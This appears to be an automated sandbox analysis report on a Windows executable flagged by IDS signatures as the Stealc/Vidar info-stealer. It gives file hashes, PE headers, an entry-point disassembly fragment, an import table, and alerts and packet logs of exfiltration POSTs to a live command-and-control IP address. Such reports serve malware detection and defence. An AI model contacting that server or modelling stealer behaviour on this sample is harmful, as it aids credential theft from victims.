                                                                                                                                                                                                                                                                                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (871)
                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                Size (bytes):876
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.185060917144897
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:NFOt6P8dBHslgT9lCuABATW7FuoB7HHHHHHHYqmffffffo:Q3dKlgZ01BAaRuSEqmffffffo
                                                                                                                                                                                                                                                                                                MD5:D7E6062A55DB61EC1AEB3A51ADFC7D7E
                                                                                                                                                                                                                                                                                                SHA1:E1AF38B258A528D14A684485F193DCBF2A2DC318
                                                                                                                                                                                                                                                                                                SHA-256:C112B7C363436BB71F851EAE285F285AA268638615A98AF4910319EEFE06635C
                                                                                                                                                                                                                                                                                                SHA-512:6C6606A251FAEB65C086C106B9A9EC80390D8310EBC846753A4D633619EDF123D6924C90F4EBEC9FF8D4F24B9D34AE7E084E46BD3FFABFA9978026220B61200A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                Preview:)]}'.["",["social security december ssi payment","sza lana sos deluxe","infinity nikki friendship glow","women volleyball championship 2024","weather forecast snow storm minnesota","nasa astronauts stuck in space","jenna ortega unicorn movie","fed rate cut mortgage interest rates"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":-5546954046579616032,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                Size (bytes):132738
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.43681777113447
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:fxkJQ7O4N5dTm+syHEt4W3XdQ4Q6vuSr/nUW2i6o:fYQ7HTt/sHdQ4Q6vDfUW8o
                                                                                                                                                                                                                                                                                                MD5:32D556DA070DB40C3B5D51E712AF0C55
                                                                                                                                                                                                                                                                                                SHA1:3237448C6F4F379F0E2B3AC58C1DEFDCCF39678E
                                                                                                                                                                                                                                                                                                SHA-256:CDE969937433B966B5C8AD7B77D42C2CC4608D8EB29E861237A4C9E9197A043C
                                                                                                                                                                                                                                                                                                SHA-512:062ADB4548E8DA71E2C77869BDF24233B9B906EB94BFFE66C9915BA74A7953ED713C8DA980DA6C0500C3EB4CC7EE9E10F729CF62087030BF4469E4951F0BA810
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                Size (bytes):175897
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                                                                                                MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                                                                                                SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                                                                                                SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                                                                                                SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                Size (bytes):5162
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                                MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                                SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                                SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                                SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                                Size (bytes):1660
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                                MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                                SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                                SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                                SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.454649285943866
                                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                File name:ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File size:147'968 bytes
                                                                                                                                                                                                                                                                                                MD5:cc36e2a5a3c64941a79c31ca320e9797
                                                                                                                                                                                                                                                                                                SHA1:50c8f5db809cfec84735c9f4dcd6b55d53dfd9f5
SHA256:6fec179c363190199c1dcdf822be4d6b1f5c4895ebc7148a8fc9fa9512eeade8
SHA512:fcea6d62dc047e40182dc4ff1e0522ca935f9aeefdb1517957977bc5d9ac654285a973261401f3b98abf1f6ed62638b9e31306fd7aaeb67214ca42dfc2888af0
SSDEEP:3072:lOBRrLUOPed9xOi756fJnhsRSK2C22/m4ESZo3XRYzXIkQfyXzdEpx:A/rLVPW0nsP2Xy+TJfWzW7
TLSH:E0E36C71A2C2A1B2CA4D33742A3E77FD9D709B222B04CDDBDBC4FC186E691D256B1416
File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ag.....................`....................@...........................#.............................................(......
Icon Hash:00928e8e8686b000
Entrypoint:0x4185c0
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp:0x676198A3 [Tue Dec 17 15:28:35 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:8329c46c809815bc572f208fdd794284
Instruction
je 00007FC8351848D5h
jne 00007FC8351848D3h
mov eax, 000046E8h
add byte ptr [ebx+eax+75h], dh
add dword ptr [eax-01754318h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-0175DD18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01747718h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01746118h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01740B18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-00139518h], edi
push dword ptr [ecx]
rol dl, 00000010h
add ah, cl
int3
int3
int3
int3
push 00420553h
call dword ptr [004219D4h]
mov dword ptr [006351C4h], eax
test eax, eax
je 00007FC835184A94h
push 00420101h
push eax
call 00007FC835171092h
mov dword ptr [00634F6Ch], eax
push 00420CB1h
push dword ptr [006351C4h]
call 00007FC83517107Dh
mov dword ptr [00634F68h], eax
push 00420D79h
push dword ptr [006351C4h]
call 00007FC835171068h
mov dword ptr [00634F70h], eax
push 00420D50h
push dword ptr [006351C4h]
call 00007FC835171053h
mov dword ptr [00634FD8h], eax
push 00420D5Bh
push dword ptr [006351C4h]
call 00007FC83517103Eh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x21728 | 0xc8 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x237000 | 0x149c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1fbd8 | 0x5c | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x21988 | 0x198 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1dd78 | 0x1de00 | 0ce5587661d15577632e53c8a6001885 | False | 0.5060800209205021 | data | 6.454457697482663 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x1f000 | 0x31cc | 0x3200 | 229d4dc7a9afabe735f24c4f77484ea8 | False | 0.49109375 | DOS executable (block device driver) | 5.681318885089064 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x23000 | 0x2121e0 | 0x1600 | bc81a9497a63b536266387a4e7cae584 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.00cfg | 0x236000 | 0x4 | 0x200 | 07ada419974a1f82db6bdd49d543272b | False | 0.03125 | data | 0.06116285224115448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x237000 | 0x149c | 0x1600 | 087859e7d46786662434790d6717c7ba | False | 0.7935014204545454 | data | 6.591187625006626 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL | Import
KERNEL32.dll | CloseHandle, CreateDirectoryA, CreateFileA, CreateThread, ExitProcess, ExpandEnvironmentStringsA, FileTimeToSystemTime, FindClose, FindFirstFileA, FindNextFileA, GetComputerNameA, GetCurrentProcess, GetDriveTypeA, GetFileInformationByHandle, GetFileSize, GetLastError, GetLocalTime, GetLogicalDriveStringsA, GetLogicalProcessorInformationEx, GetModuleHandleA, GetProcessHeap, GetTickCount, HeapAlloc, HeapFree, OpenProcess, RaiseException, ReadFile, ReadProcessMemory, SetFilePointer, Sleep, SystemTimeToFileTime, VirtualAlloc, VirtualAllocExNuma, VirtualFree, VirtualQueryEx, WaitForSingleObject, WriteFile, lstrcatA, lstrcmpiW, lstrcpyA, lstrlenA
msvcrt.dll | ??2@YAPAXI@Z, ??3@YAXPAX@Z, ??_U@YAPAXI@Z, ??_V@YAXPAX@Z, _itoa_s, _splitpath, atexit, free, isupper, malloc, memchr, memcmp, memcpy, memmove, memset, rand, srand, strchr, strcmp, strcpy, strcpy_s, strlen, strncpy, strstr, strtok_s
USER32.dll | CharToOemA, CloseDesktop, CreateDesktopA, GetDesktopWindow, OpenDesktopA, wsprintfA, wsprintfW
api-ms-win-crt-runtime-l1-1-0.dll | _invalid_parameter_noinfo_noreturn
api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vsnprintf_s
ADVAPI32.dll | GetCurrentHwProfileA, GetUserNameA, RegGetValueA, RegOpenKeyExA
SHELL32.dll | SHFileOperationA, SHGetFolderPathA
WS2_32.dll | WSACleanup, WSAStartup, closesocket, connect, freeaddrinfo, getaddrinfo, htons, recv, send, socket
SHLWAPI.dll | PathFileExistsA
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-20T07:31:06.772119+0100 | 2859378 | ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 | 1 | 192.168.2.6 | 49716 | 116.203.12.114 | 443 | TCP
2024-12-20T07:31:09.191655+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 | 1 | 192.168.2.6 | 49722 | 116.203.12.114 | 443 | TCP
2024-12-20T07:31:11.495790+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 116.203.12.114 | 443 | 192.168.2.6 | 49729 | TCP
2024-12-20T07:31:13.791133+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 116.203.12.114 | 443 | 192.168.2.6 | 49742 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.347337961 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.376797915 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.691097021 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.886213064 CET44349716116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.886378050 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.886683941 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.886694908 CET44349716116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.890927076 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:05.890933037 CET44349716116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.549937963 CET49721443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.549982071 CET4434972120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.550074100 CET49721443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.551225901 CET49721443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.551239014 CET4434972120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.772159100 CET44349716116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.772254944 CET44349716116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.772258043 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.772329092 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.777704954 CET49716443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.777723074 CET44349716116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.916950941 CET49722443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.916984081 CET44349722116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.917078018 CET49722443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.917357922 CET49722443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:06.917373896 CET44349722116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:07.973761082 CET44349703173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:07.973866940 CET49703443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.314507961 CET44349722116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.314601898 CET49722443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.316662073 CET49722443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.316672087 CET44349722116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.319499969 CET49722443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.319508076 CET44349722116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.795989037 CET4434972120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.796186924 CET49721443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.797719002 CET49721443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.797732115 CET4434972120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.797979116 CET4434972120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.799133062 CET49721443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.799133062 CET49721443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.799151897 CET4434972120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.802639961 CET49721443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:08.847345114 CET4434972120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.191673994 CET44349722116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.191699028 CET44349722116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.191781044 CET44349722116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.191780090 CET49722443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.191780090 CET49722443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.191885948 CET49722443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.192152977 CET49722443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.192172050 CET44349722116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.202192068 CET49729443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.202239037 CET44349729116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.202429056 CET49729443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.202744007 CET49729443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.202758074 CET44349729116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.466617107 CET4434972120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.466713905 CET4434972120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.466763020 CET49721443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.466847897 CET49721443192.168.2.620.198.119.143
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:09.466871023 CET4434972120.198.119.143192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:10.611695051 CET44349729116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:10.611759901 CET49729443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:10.612113953 CET49729443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:10.612133980 CET44349729116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:10.613846064 CET49729443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:10.613854885 CET44349729116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:11.495590925 CET44349729116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:11.495611906 CET44349729116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:11.495646000 CET49729443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:11.495687962 CET44349729116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:11.495716095 CET44349729116.203.12.114192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:11.495721102 CET49729443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:11.495738029 CET49729443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:11.495754957 CET49729443192.168.2.6116.203.12.114
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:11.496035099 CET49729443192.168.2.6116.203.12.114
